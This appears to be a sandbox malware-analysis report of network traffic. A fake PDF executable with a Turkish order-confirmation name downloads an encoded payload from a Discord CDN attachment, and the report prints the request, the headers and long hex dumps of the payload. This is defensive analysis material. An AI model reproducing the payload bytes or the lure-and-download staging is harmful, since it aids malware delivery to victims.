                                2022-06-26 07:42:48 UTC46INData Raw: 7c 6d c2 1c 25 0d 99 da da da 75 0d 9b c7 da da 0e 1b c6 04 af 69 12 2b af 81 12 e2 4f fd 97 3f 1e ad 20 da af 20 da 00 da 25 25 25 ea 86 e0 3d 9c 1c 25 23 20 da 23 a6 50 0f 5e eb 27 5e 23 31 58 2f af 69 12 2b 2f 69 12 e2 50 ed 3a 83 36 34 38 9e 7c 71 c2 1c 25 5e 1d fa 52 e2 ea 7e e0 35 9e 1c 25 ea b7 e5 9e 68 65 25 30 66 11 5c e9 89 23 da da 2e 7b 32 a2 e0 6d c2 1c 25 e4 29 25 25 a2 e0 71 c2 1c 25 e4 25 25 25 a2 e0 75 c2 1c 25 dc 25 25 25 0d 48 c7 da da 60 e5 99 e0 7e 6d c2 1c 25 8b 60 e5 99 f6 66 f5 8b 5c 07 da de ea 92 f7 64 f0 71 c2 1c 25 ea 92 e5 9c 0d 2f 7e 75 c2 1c 25 e3 61 9e 65 25 9a 3d 9c 1c 25 94 2d 25 25 25 ce 80 5e 18 f5 e5 1c 25 27 ea 60 88 25 25 25 0d 48 da da da a9 e5 99 ee eb e0 30 c2 1c 25 25 eb e0 79 c2 1c 25 25 c4 9a 25 25 25 30 0d 15
                                Data Ascii: |m%ui+O? %%%=%# #P^'^#1X/i+/iP:648|q%^R~5%he%0f\#.{2m%)%%q%%%%u%%%%H`~m%`f\dq%/~u%ae%=%-%%%^%'`%%%H0%%y%%%%%0
                                2022-06-26 07:42:48 UTC48INData Raw: 25 da 00 59 ce 1c 25 66 e5 30 66 11 5e e9 11 2e 0e e5 64 20 11 0e e5 30 8d 91 a2 65 25 89 da 55 89 64 45 0d 20 78 da da 66 fd 60 b6 99 12 64 38 15 eb 20 19 25 68 30 11 66 9e 0d af 09 da da 66 20 11 64 20 1d eb 20 21 e6 68 20 15 75 8f dc 66 e8 cd aa 1c 25 d7 dc 7c 15 9d 65 25 0d 9d c8 da da 66 f5 c6 39 66 e8 45 f5 1c 25 d7 dc 7c 15 9d 65 25 0d 4b c8 da da 66 f5 64 7f 31 66 e7 0d 8b 97 da da 0e e5 7f 34 34 89 64 35 8d 4e a2 65 25 68 20 11 0d 98 9d da da 9e c4 ee 97 da da c6 15 36 66 c0 38 9e 2e 66 fd 60 b6 50 e0 0d 7d da da da 66 9e 36 9e 2e 7b 2c 96 39 9e 1c 25 66 19 c6 3b 66 de 64 2b 66 2b 66 25 64 de df 2d 25 25 25 66 2b 0d 5f 87 da da 5e 16 25 50 c0 7f 83 36 9e b5 2e 8d 11 a2 65 25 0d 7c c1 da da 66 fd 60 b6 99 35 8d 21 a2 65 25 2e 0d bd c1 da da 7e 61
                                Data Ascii: %Y%f0f^.d 0e%UdE xf`d8 %h0ff d !h uf%|e%f9fE%|e%Kfd1f44d5Ne%h 6f8.f`P}f6.{,9%f;fd+f+f%d-%%%f+_^%P6.e%|f`5!e%.~a
                                2022-06-26 07:42:48 UTC49INData Raw: da da 66 29 49 da 6d 31 66 29 49 5e 9d 31 25 50 6d 66 f9 66 1e 45 0d e4 d8 da da 0d e9 72 da da 16 1e 49 99 59 68 1e 31 0d 92 d6 da da 66 ed 5c d4 da da 25 25 50 e4 66 9e 0d 43 23 da da c6 f4 60 a4 5a f0 66 9c 94 da da 25 25 74 d2 d4 60 f7 50 e2 66 9e 0d de 23 da da 7f 36 9e 66 35 0e a4 64 2d 66 e7 0d e2 8d da da 9e 66 e5 30 66 11 5e e9 19 2e 66 fd 77 0d 2c bd da da 64 20 19 0e e5 30 8d 2f a8 65 25 89 da 55 89 64 45 b4 58 23 0e e5 30 8d 11 f1 65 25 89 da 55 89 64 45 66 9e 0d 3d 9d da da 75 0d ef 72 da da 64 20 1d 0e e5 7f 34 34 89 64 35 8d ce f1 65 25 b6 07 b4 48 23 9e c4 6e 91 da da c6 ce 0e e5 7f 34 34 89 64 35 8d ec a8 65 25 66 20 19 75 0d ca 72 da da 9e c4 50 91 da da c6 ca 66 20 1d 36 66 c0 38 9e 68 65 25 f8 25 25 25 31 9e 1c 25 b1 aa 1c 25 29 9e 1c
                                Data Ascii: f)Im1f)I^1%PmffErIYh1f\%%PfC#`Zf%%t`Pf#6f5d-ff0f^.fw,d 0/e%UdEX#0e%UdEf=urd 44d5e%H#n44d5e%f urPf 6f8he%%%%1%%)
                                2022-06-26 07:42:48 UTC50INData Raw: 65 dd 41 a8 65 25 0d 45 91 da da dd 2d f3 65 25 0d 63 91 da da a5 18 40 0b 1c 25 25 99 ea dd 5d 9c 1c 25 df 0d ac 65 25 0d ef 93 da da 0d e4 c4 da da 0d 2d 0f da da 0d ce d0 da da 0d bb cc da da 0e e5 7f 34 34 89 64 35 8d b6 ac 65 25 9e c4 86 42 da da c6 1d 38 9e 25 25 25 da da da da 27 25 25 25 55 9d 25 25 2e 7b 66 17 66 fd 16 ce 58 33 66 9e 06 eb 0d b4 81 da da de eb 83 36 9e 66 eb 06 9e 0d a6 81 da da de 9e 83 36 9e 66 e5 30 66 11 0e e5 30 8d 14 f7 65 25 89 da 55 89 64 45 da e0 cd c2 1c 25 0e e5 7f 34 34 89 64 35 8d 65 f7 65 25 9e c4 6b 42 da da c6 1d 38 9e 66 e5 5e 08 cd c2 1c 25 dc 9e 30 66 11 0e e5 30 8d 4c f7 65 25 89 da 55 89 64 45 da e0 d1 c2 1c 25 0e e5 7f 34 34 89 64 35 8d 9d f7 65 25 9e c4 33 42 da da c6 1d 38 9e 66 e5 5e 08 d1 c2 1c 25 dc 9e
                                Data Ascii: eAe%E-e%c@%%]%e%-44d5e%B8%%%'%%%U%%.{ffX3f6f6f0f0e%UdE%44d5ee%kB8f^%0f0Le%UdE%44d5e%3B8f^%
                                2022-06-26 07:42:48 UTC52INData Raw: 15 66 9e 36 34 38 e7 35 25 b5 da 00 6d ce 1c 25 66 e5 da 00 69 ce 1c 25 66 e5 da 00 65 ce 1c 25 66 e5 da 00 61 ce 1c 25 66 e5 30 66 11 2c 2e 7b 66 ff 66 15 64 38 21 66 20 2d 5e 9d 21 25 99 f4 7b 66 20 2d 66 65 21 75 0d 18 68 da da 64 20 21 5e 58 21 25 50 de 64 38 21 66 20 21 83 36 34 38 9e b5 30 66 11 2c 8d 5d b4 65 25 0d 37 68 da da 64 20 21 30 df c9 f7 65 25 dd 6d b4 65 25 0d 82 da da da 34 7e d5 c2 1c 25 30 df f9 f7 65 25 dd 81 b4 65 25 0d 6c da da da 34 7e d9 c2 1c 25 30 df f9 f7 65 25 dd 89 b4 65 25 0d 56 da da da 34 7e dd c2 1c 25 30 df 05 f7 65 25 dd 91 b4 65 25 0d 40 da da da 34 7e e1 c2 1c 25 30 df 05 f7 65 25 dd 99 b4 65 25 0d 2a da da da 34 7e e5 c2 1c 25 30 df 05 f7 65 25 dd a1 b4 65 25 0d 14 da da da 34 7e e9 c2 1c 25 30 df 05 f7 65 25 dd a9
                                Data Ascii: f6485%m%fi%fe%fa%f0f,.{ffd8!f -^!%{f -fe!uhd !^X!%Pd8!f !6480f,]e%7hd !0e%me%4~%0e%e%l4~%0e%e%V4~%0e%e%@4~%0e%e%*4~%0e%e%4~%0e%
                                2022-06-26 07:42:48 UTC53INData Raw: 25 d9 5b 65 25 e5 5b 65 25 e9 5b 65 25 ed 5b 65 25 e1 5b 65 25 59 59 65 25 75 59 65 25 b1 59 65 25 f0 20 7b 3c 97 44 3c 93 99 79 54 95 40 1e 3c 4e 99 20 97 97 4a 97 66 e5 e1 01 65 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 e1 01 65 25 31 25 25 25 a1 52 65 25 d9 5b 65 25 e5 5b 65 25 e9 5b 65 25 ed 5b 65 25 e1 5b 65 25 59 59 65 25 75 59 65 25 b1 59 65 25 f0 20 7b 3c 97 44 3c 93 99 2a 9b 40 97 8b 91 4a 52 20 97 97 4a 97 66 e5 45 b8 65 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 45 b8 65 25 31 25 25 25 a1 52 65 25 d9 5b 65 25 e5 5b 65 25 e9 5b 65 25 ed 5b 65 25 e1 5b 65 25 59 59 65 25 75 59 65 25 b1 59 65 25 f2 20 7b 3c 97 44 3c 93 99 24 93 9b 3c 91 44 89 1c 97 42 20 97 97
                                Data Ascii: %[e%[e%[e%[e%[e%YYe%uYe%Ye% {<D<yT@<N Jfe%%%%%%%%%%%%%%%%%%%%%%%%%%%%%e%1%%%Re%[e%[e%[e%[e%[e%YYe%uYe%Ye% {<D<*@JR JfEe%%%%%%%%%%%%%%%%%%%%%%%%%%%%%Ee%1%%%Re%[e%[e%[e%[e%[e%YYe%uYe%Ye% {<D<$<DB


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                1192.168.2.349719162.159.130.233443C:\Users\user\Desktop\Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe
                                TimestampkBytes transferredDirectionData
                                2022-06-26 07:42:48 UTC57OUTGET /attachments/990482594137251863/990489253987360768/Eluiezilfwmdrgrdfrqpnwmurrnwnhm HTTP/1.1
                                User-Agent: 21
                                Host: cdn.discordapp.com
                                Cache-Control: no-cache
                                2022-06-26 07:42:48 UTC57INHTTP/1.1 200 OK
                                Date: Sun, 26 Jun 2022 07:42:48 GMT
                                Content-Type: application/octet-stream
                                Content-Length: 279040
                                Connection: close
                                CF-Ray: 72144ef0eddbbb95-FRA
                                Accept-Ranges: bytes
                                Cache-Control: public, max-age=31536000
                                Content-Disposition: attachment;%20filename=Eluiezilfwmdrgrdfrqpnwmurrnwnhm
                                ETag: "7d74af495b07aad93486870343b767e3"
                                Expires: Mon, 26 Jun 2023 07:42:48 GMT
                                Last-Modified: Sun, 26 Jun 2022 05:30:40 GMT
                                Vary: Accept-Encoding
                                CF-Cache-Status: MISS
                                Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                x-goog-generation: 1656221440589477
                                x-goog-hash: crc32c=Xt3y7g==
                                x-goog-hash: md5=fXSvSVsHqtk0hocDQ7dn4w==
                                x-goog-metageneration: 1
                                x-goog-storage-class: STANDARD
                                x-goog-stored-content-encoding: identity
                                x-goog-stored-content-length: 279040
                                X-GUploader-UploadID: ADPycdvxBSrtOJadICrFNKKLfO89NiJC2XolLUl9l7gh0iKGSgrZ72iFb7WGAL9LAxlO6pTzoCsdjuJYzhz5OOHW7aIxBA
                                X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=b6QKg3CSTE%2B519lp1p3v10r2uF4jcCWfiuHvEH%2BIvZtI9%2FyN8BLBAVUiP1VZglETdO9O81AT2sJY0zJo5Q7E9QyKCBFtp8s1QcgluhsHquUIFJ6tKzZSzfdsn1fhf3OUfO2EqQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                2022-06-26 07:42:48 UTC59INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                                2022-06-26 07:42:48 UTC59INData Raw: 28 7f b5 25 de 25 25 25 29 25 25 25 da da 25 25 dd 25 25 25 25 25 25 25 65 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 dc 25 25 33 fa df 33 25 d9 e4 a8 fc dd dc 71 a8 fc 79 8d 44 4e 45 95 97 4a 42 97 3c 48 45 3e 3c 93 93 4a 99 45 87 40 45 97 50 93 45 44 93 45 69 2a 2e 45 48 4a 89 40 53 e8 e8 2f 49 25 25 25 25 25 25 25 19 fb 3d ab d5 92 9b b0 d5 92 9b b0 d5 92 9b b0 0e 86 9d b0 92 92 9b b0 ba cd 58 b0 8e 92 9b b0 ba cd a1 b0 96 92 9b b0 ba cd 97 b0 d7 92 9b b0 63 9a 04 b0 90 92 9b b0 7d cd 58 b0 8e 92 9b b0 63 9a 3b b0 8c 92 9b b0 d5 92 52 b0 a5 db 9b b0 0e 9a 06 b0 7e 92 9b b0 ab 6c 58 b0 47 92 9b b0 ab 6c a1 b0 8c 92 9b b0 86 4f 01 b0 d9 92 9b b0 52 8c 95 b0 8c 92 9b b0 77 44 3e 8d d5 92 9b
                                Data Ascii: (%%%%)%%%%%%%%%%%%e%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%33%qyDNEJB<HE><JE@EPEDEi*.EHJ@S/I%%%%%%%=Xc}Xc;R~lXGlORwD>
                                2022-06-26 07:42:48 UTC60INData Raw: 59 65 25 ec 79 24 93 99 40 97 8b 3c 3e 40 89 2a 87 8f 40 3e 99 66 e5 da 00 b5 cc 1c 25 66 e5 da 00 b1 cc 1c 25 66 e5 da 00 ad cc 1c 25 66 e5 da 00 a9 cc 1c 25 66 e5 da 00 a5 cc 1c 25 66 e5 da 00 c9 cc 1c 25 66 e5 da 00 a1 cc 1c 25 66 e5 da 00 c5 cc 1c 25 66 e5 da 00 9d cc 1c 25 66 e5 da 00 99 cc 1c 25 66 e5 da 00 95 cc 1c 25 66 e5 da 00 91 cc 1c 25 66 e5 da 00 8d cc 1c 25 66 e5 da 00 89 cc 1c 25 66 e5 da 00 85 cc 1c 25 66 e5 da 00 81 cc 1c 25 66 e5 da 00 7d cc 1c 25 66 e5 da 00 79 cc 1c 25 66 e5 da 00 75 cc 1c 25 66 e5 da 00 c1 cc 1c 25 66 e5 da 00 71 cc 1c 25 66 e5 da 00 6d cc 1c 25 66 e5 da 00 69 cc 1c 25 66 e5 da 00 d9 cc 1c 25 66 e5 da 00 d5 cc 1c 25 66 e5 da 00 d1 cc 1c 25 66 e5 da 00 65 cc 1c 25 66 e5 da 00 61 cc 1c 25 66 e5 da 00 e9 cc 1c 25 66 e5
                                Data Ascii: Ye%y$@<>@*@>f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f}%fy%fu%f%fq%fm%fi%f%f%f%fe%fa%f%f
                                2022-06-26 07:42:48 UTC61INData Raw: 25 66 2b 66 65 2d 75 0d 3b 21 da da 60 e5 50 2f a2 e0 ed c0 1c 25 dc 25 25 25 66 2b 0d ec d8 da da 66 69 49 29 64 2b dd 11 c0 1c 25 16 2b 50 b1 0e e5 64 e2 5e a1 49 31 25 99 ec 66 69 49 2d 64 e2 66 69 49 31 06 69 49 2d 64 22 29 5e e9 3d 38 3a 83 36 9e 66 e5 2e 7b 32 30 5e e9 0d 66 b4 64 39 49 68 99 49 2d 68 a1 49 29 68 91 49 31 66 f5 66 ef 5c bc 25 15 da da 64 71 49 35 de 39 49 5c e7 da ea 25 25 5c 07 25 15 da da 64 79 49 39 66 69 49 35 64 de 66 69 49 39 06 69 49 35 64 1e 29 7c 11 c0 1c 25 64 e2 c6 36 66 e2 66 65 2d 64 2b 66 e2 66 65 31 de 2b 64 20 25 66 2b 16 69 49 35 4e 2b 66 69 49 35 64 2b 66 20 25 16 69 49 39 9b e2 66 69 49 39 64 20 25 66 2b 16 20 25 4e fa 8f 29 8d 25 35 25 25 66 20 25 06 2b 75 66 2b 75 0d 4b d6 da da 60 e5 50 2b 0e e5 64 de c6 ea 66
                                Data Ascii: %f+fe-u;!`P/%%%%f+fiI)d+%+Pd^I1%fiI-dfiI1iI-d")^=8:6f.{20^fd9IhI-hI)hI1ff\%dqI59I\%%\%dyI9fiI5dfiI9iI5d)|%d6ffe-d+ffe1+d %f+iI5N+fiI5d+f %iI9fiI9d %f+ %N)%5%%f %+uf+uK`P+df
                                2022-06-26 07:42:48 UTC63INData Raw: 0d f9 1b da da eb e0 e9 c0 1c 25 25 7c 49 0b 1c 25 75 0d c7 1b da da 0e e5 7e 49 0b 1c 25 7c 11 c0 1c 25 64 20 1d c6 f6 8d 25 a5 25 25 8f 25 66 20 1d 66 65 2d 75 0d b3 1b da da 66 20 1d 66 25 64 20 1d dd 11 c0 1c 25 16 20 1d 50 b6 dd 11 c0 1c 25 0d 43 d2 da da dd 21 c0 1c 25 0d 39 d2 da da dd 4d 0b 1c 25 0d 2f d2 da da 7c 09 c0 1c 25 64 20 21 5e 58 21 25 99 fc 66 20 21 66 25 7e 09 c0 1c 25 66 20 21 75 0d 08 1b da da 7c 09 c0 1c 25 64 20 21 5e 58 21 25 50 ba 0e e5 7f 34 34 89 64 35 8d b2 41 65 25 a5 18 28 05 1c 25 25 99 2f 8d f1 c0 1c 25 0d 02 1b da da 8d f1 c0 1c 25 0d 00 1b da da 9e c4 8a 41 25 25 c6 b6 34 34 38 9e b5 2e 5e e9 1d 16 e0 3d 0b 1c 25 50 e4 66 75 29 64 f0 3d 0b 1c 25 66 75 29 64 39 49 66 75 2d 5c 1f 25 35 25 25 5a 73 16 29 49 50 f2 60 f7 54
                                Data Ascii: %%|I%u~I%|%d %%%%f fe-uf f%d % P%C!%9M%/|%d !^X!%f !f%~%f !u|%d !^X!%P44d5Ae%(%%/%%A%%448.^=%Pfu)d=%fu)d9Ifu-\%5%%Zs)IP`T
                                2022-06-26 07:42:48 UTC64INData Raw: 29 66 e2 7e 45 0b 1c 25 66 22 29 7e 41 0b 1c 25 d5 dc 5e e9 35 3a 83 36 9e 68 65 25 2e 5e e9 1d 66 fd 66 f9 68 1e 29 0d 19 1b da da 5e 61 49 25 99 e6 66 e9 0d 32 da da da a9 e5 50 29 0e e5 c6 27 d5 dc 34 7f 36 9e b5 2e 7b 5e e9 1d 66 17 66 fd 66 f1 68 7b 29 66 9e 0d 46 d2 da da 5e 61 49 25 99 e6 66 e9 0d 4b da da da a9 e5 50 29 0e e5 c6 27 d5 dc 34 7f 83 36 9e 68 65 25 2c 66 f9 0e a4 64 2f 60 e5 54 de 5e e5 de 9c 1d 27 18 25 29 25 25 5a f4 66 e8 49 0b 1c 25 66 71 5c 19 64 2f 5e 5f 25 50 2d 65 18 dc 29 25 25 50 c2 66 27 7f 9e 68 65 25 2e 7b 32 30 5e e9 19 66 fd 68 99 49 2d 9a 3d 0b 1c 25 98 41 0b 1c 25 7c 35 0b 1c 25 64 2b 66 2b 16 7d 2d ea b3 86 25 25 25 66 e2 64 2b 66 2b 66 65 2d 16 fd ea b3 bf 25 25 25 66 3b 64 7f 2d 66 3b 66 77 29 64 3b 66 3b 16 7f 2d
                                Data Ascii: )f~E%f")~A%^5:6he%.^ffh)^aI%f2P)'46.{^fffh{)fF^aI%fKP)'46he%,fd/`T^'%)%%ZfI%fq\d/^_%P-e)%%Pf'he%.{20^fhI-=%A%|5%d+f+}-%%%fd+f+fe-%%%f;d-f;fw)d;f;-
                                2022-06-26 07:42:48 UTC65INData Raw: 65 25 a5 18 28 05 1c 25 25 99 2f 8d f1 c0 1c 25 0d 3f 11 da da 9e c4 d1 37 25 25 c6 c0 66 20 21 36 66 c0 38 9e 66 e5 2e 7b 32 30 5e e9 19 66 ff 5e 9e e2 5e be 21 5e d6 31 58 e0 96 31 25 25 25 5e 0d 29 64 29 49 66 29 49 66 55 5c 0b 21 da da 5a 66 29 49 de eb 64 69 49 29 16 ce 50 e2 d5 dc c4 98 dc 25 25 16 ce ea b3 b5 25 25 25 66 13 06 c6 66 79 49 29 16 f0 45 0b 1c 25 50 51 04 08 45 0b 1c 25 dc 08 41 0b 1c 25 5e 18 41 0b 1c 25 31 ea 68 4a dc 25 25 dc 08 45 0b 1c 25 04 08 41 0b 1c 25 66 03 c4 81 dc 25 25 64 69 49 29 66 69 49 29 1b 25 27 50 3d 66 69 49 29 64 69 49 2d 66 69 49 2d de 8d 2d 66 69 49 2d 0d 2c d0 da da 5e d8 31 a1 fe 66 29 49 de 9e 64 69 49 29 5e a8 27 66 69 49 29 64 4d 66 69 49 29 5e e5 29 0d 67 1b da da c4 ea dc 25 25 66 03 c4 2d dc 25 25 66 d6
                                Data Ascii: e%(%%/%?7%%f !6f8f.{20^f^^!^1X1%%%^)d)If)IfU\!Zf)IdiI)P%%%%%ffyI)E%PQE%A%^A%1hJ%%E%A%f%%diI)fiI)%'P=fiI)diI-fiI--fiI-,^1f)IdiI)^'fiI)dMfiI)^)g%%f-%%f
                                2022-06-26 07:42:48 UTC67INData Raw: 2b a5 5d 47 50 e8 66 2b a5 9d dc 47 50 e0 5e 2b 27 c6 ba 0e c8 66 2b 64 69 49 31 c6 36 66 2b a5 5d 47 50 65 66 2b 75 0d 7b c0 da da 64 2b c6 39 66 2b 75 0d 6f c0 da da 64 e2 66 e2 06 2b de 0d 66 e2 64 2b 66 2b af 3d a9 b6 99 e0 a5 d6 47 50 ba 66 2b a5 5d 25 99 45 66 2b 75 0d 47 c0 da da 64 2b c6 39 66 2b 75 0d 3b c0 da da 64 e2 66 e2 06 2b de 0d 66 e2 64 2b 66 2b a5 5d 45 52 c3 66 69 49 29 66 b0 0d 9d f4 25 25 66 69 49 31 64 2b 66 69 49 29 66 25 64 69 49 35 0e c8 c6 56 66 2b a5 5d 47 50 75 66 2b 75 0d b0 09 da da 64 2b c6 49 66 2b 75 0d a4 09 da da 64 e2 66 2b 16 e2 4e 39 66 2b af 25 66 79 49 35 ad 29 4f da 2b 20 66 2b 16 e2 97 11 66 2b af 3d a9 b6 99 e0 a5 d6 47 50 aa 66 2b a5 5d 25 99 55 66 2b 75 0d 6c 09 da da 64 2b c6 49 66 2b 75 0d 60 09 da da 64 e2
                                Data Ascii: +]GPf+GP^+'f+diI16f+]GPef+u{d+9f+uodf+fd+f+=GPf+]%Ef+uGd+9f+u;df+fd+f+]ERfiI)f%%fiI1d+fiI)f%diI5Vf+]GPuf+ud+If+udf+N9f+%fyI5)O+ f+f+=GPf+]%Uf+uld+If+u`d
                                2022-06-26 07:42:48 UTC68INData Raw: 59 65 25 25 25 a0 53 e1 c7 8c 12 65 25 25 65 9b 5f 46 e6 03 5f 65 25 25 0d 64 29 fe a2 af 63 65 25 25 87 d1 a0 c6 9d 88 1c 65 25 a5 9f f2 92 4b b2 fd 69 65 25 b5 d1 93 57 9d ab 62 6d 65 25 d9 32 2f 1a 3b 8d 84 26 65 25 7c c8 f1 f3 f6 e7 ae 73 65 c5 a9 39 65 3c 2c 34 a9 77 65 ed 80 f4 b5 94 80 4a 80 30 65 5f ea 45 19 02 6a a6 f3 7d 65 a9 e4 b9 1d 9d 14 1a 5c 81 65 c0 e6 94 5b b2 e2 6a 7c 3a 65 ba 73 42 29 a8 a4 17 a4 87 65 bb 47 5c 20 65 a1 4a 21 40 65 c3 90 95 06 cd 88 a0 78 44 65 b0 cb aa da 24 fa 9d e7 ae 65 7e 39 76 a0 3b 86 8e ca 18 1c 05 b1 c4 a5 a4 22 df 6e cd 1c cf f2 0b 5a 06 7c 3b db 37 67 46 30 02 14 68 d2 95 05 a1 67 55 a4 61 be da bb 77 af c2 67 b3 03 d4 78 d6 c6 a3 cf 2c 1e b1 0a 8f 81 f4 21 4b f7 96 1e 9b be f1 17 04 0a a9 5c 4b 69 f7 2f b5
                                Data Ascii: Ye%%%Se%%e_F_e%%d)ce%%e%Kie%Wbme%2/;&e%|se9e<,4weJ0e_Ej}e\e[j|:esB)eG\ eJ!@exDe$e~9v;"nZ|;7gF0hgUawgx,!K\Ki/
                                2022-06-26 07:42:48 UTC69INData Raw: 7b 8b 66 57 8b e4 1b 99 f2 8b 5c 23 25 e5 4e 35 75 66 25 0d 9d da da da 7d 99 e0 64 cc 83 da bc 83 66 2d da 3c 15 9e b5 77 2c 2e a9 f7 a1 de da 75 19 0c f7 68 71 49 35 89 66 3f 64 f4 64 44 2d a2 1c 29 f4 12 65 25 64 1c 31 89 64 2f 36 34 7f 9e c4 5f dc 25 25 66 69 49 51 66 65 31 60 e5 99 33 66 2d d7 5c 75 da 2c 21 7d 0d e4 25 25 25 0d cd 27 25 25 9e 68 65 25 66 35 da 77 1d 9e 66 e5 2e 66 fd 66 9e 66 35 da 77 09 66 9e 36 9e 66 e5 a9 f7 5a dc 9e 75 77 66 35 da 77 0d 7f 7d 9e b5 a5 18 4d e5 1c 25 dc 9b ec 8f 25 8f 25 8f 25 8d ba 1f c8 33 da f0 39 05 1c 25 9e b5 a5 18 4d e5 1c 25 25 99 f2 75 75 77 79 8f 27 8f 25 8d 09 1f c8 33 da f0 39 05 1c 25 5e e9 2d 7d 9e 68 65 25 79 8f dc 8f 25 8d 05 1f c8 33 da f0 39 05 1c 25 5e e9 29 7d 9e 68 65 25 a5 18 4d e5 1c 25 dc
                                Data Ascii: {fW\#%N5uf%}df-<w,.uhqI5f?ddD-)e%d1d/64_%%fiIQfe1`3f-\u,!}%%%'%%he%f5wf.fff5wf6fZuwf5w}M%%%%39%M%%uuwy'%39%^-}he%y%39%^)}he%M%
                                2022-06-26 07:42:48 UTC71INData Raw: 65 29 64 20 21 0e e5 30 8d 38 61 65 25 89 da 55 89 64 45 60 b6 a3 f6 26 64 83 31 66 20 21 66 69 fd 29 64 20 1d 5e 58 1d 25 99 de da 30 1d 60 b6 5a c0 0e e5 7f 34 34 89 64 35 c6 39 c4 1b d6 da da 0d 7c da da da 0d 9d d8 da da 0d a2 d8 da da 3a 83 36 34 34 38 9e 30 66 11 5e e9 1d 2e 7b 32 9a 5d 0b 1c 25 66 22 2d 60 e5 99 79 66 55 0e b6 66 65 29 64 20 21 0e e5 30 8d a8 61 65 25 89 da 55 89 64 45 16 ce a3 3f 66 20 21 66 29 fd 64 20 1d 1e 64 3a 31 5e 58 1d 25 99 de da 30 1d 16 ce 5a 0b 0e e5 7f 34 34 89 64 35 c6 39 c4 ab d6 da da 0d 0c da da da 0d 2d d8 da da 0d 32 d8 da da 3a 83 36 34 34 38 9e 2c 7b 32 e3 5d 0b 1c 25 68 58 e9 94 e6 25 25 25 ce 80 6a e0 7d 0b 1c 25 6a e0 79 0b 1c 25 64 08 71 0b 1c 25 64 f8 75 0b 1c 25 7e 65 0b 1c 25 64 f0 6d 0b 1c 25 68 28 e9
                                Data Ascii: e)d !08ae%UdE`&d1f !fi)d ^X%0`Z44d59|:64480f^.{2]%f"-`yfUfe)d !0ae%UdE?f !f)d d:1^X%0Z44d59-2:6448,{2]%hX%%%j}%jy%dq%du%~e%dm%h(
                                2022-06-26 07:42:48 UTC72INData Raw: 0d 7c f5 da da 38 e7 29 25 b5 2e 7b 32 30 5c e9 29 15 da da 75 5e e9 21 66 cc 64 39 49 66 1d 60 1b 5a e4 66 a2 0d a9 23 da da c6 3a 68 93 dc 5c d8 da e2 25 25 58 4d 7b 68 69 49 2d 66 71 49 29 df da ea 25 25 0d a9 da da da 66 fd 60 b6 a1 ea 68 79 49 29 66 a2 66 a6 0d 1c da da da c6 51 66 b8 de b6 66 a2 66 ae 0d 57 29 25 25 7b 66 e2 66 71 49 29 66 ae 0d 79 da da da 66 fd 60 b6 58 27 0e b6 66 a2 66 ae 0d ee 29 25 25 5c e9 29 35 25 25 38 3a 83 36 9e 77 64 07 94 dc 25 25 25 0d d6 23 da da 7f 9e b5 0c a4 60 f7 99 fc 77 5f 2f 99 f2 5f 6f dc 99 ec 5f 6f 27 99 e6 5f 6f de 99 e0 5e e7 29 c6 0d 67 67 67 64 ac 7f 04 ac c4 f1 23 da da 9e 68 65 25 0c a4 60 f7 99 08 77 8b 16 2f 99 45 8b 16 6f 27 99 f2 8b 16 6f 29 99 33 8b 16 6f 2b 99 e0 5e e7 2d c6 09 5e e7 27 5e e7 27
                                Data Ascii: |8)%.{20\)u^!fd9If`Zf#:h\%%XM{hiI-fqI)%%f`hyI)ffQfffW)%%{ffqI)fyf`X'ff)%%\)5%%8:6wd%%%#`w_/_o_o'_o^)gggd#he%`w/Eo'o)3o+^-^'^'
                                2022-06-26 07:42:48 UTC73INData Raw: 25 25 25 75 0d a9 a6 da da 5e 9e 29 73 50 0d 83 36 9e 68 65 25 60 f7 ea a9 e1 da da da 66 6f 21 ac c4 ea a9 8c da da da 2c 77 75 0d 30 a6 da da 60 e5 ea a9 4c da da da 9e 2e 7b 32 30 5c e9 29 15 da da 75 5e e9 21 66 cc 64 39 49 66 1d 60 1b 5a e4 66 a2 0d a5 da da da c6 38 68 93 dc 5c d8 da e2 25 25 58 4d 7b 68 69 49 2d 66 71 49 29 df da e2 25 25 0d 41 1f da da 66 fd 60 b6 a3 ea 68 79 49 29 66 a2 66 a6 0d 14 25 25 25 c6 4f 66 b8 66 a2 66 ae 0d ad dc 25 25 7b 66 e2 66 71 49 29 66 ae 0d 13 d4 da da 66 fd 60 b6 58 27 0e b6 66 a2 66 ae 0d 44 dc 25 25 5c e9 29 35 25 25 38 3a 83 36 9e 66 e5 60 a4 ea a9 31 da da da 75 2c 77 0d cd ef da da 60 e5 ea a9 f1 23 da da 7f da 57 64 27 0d cb ef da da 9e b5 0c a4 60 f7 99 08 77 8b 16 2f 99 45 8b 16 6f 27 99 f2 8b 16 6f 29
                                Data Ascii: %%%u^)sP6he%`fo!,wu0`L.{20\)u^!fd9If`Zf8h\%%XM{hiI-fqI)%%Af`hyI)ff%%%Offf%%{ffqI)ff`X'ffD%%\)5%%8:6f`1u,w`#Wd'`w/Eo'o)
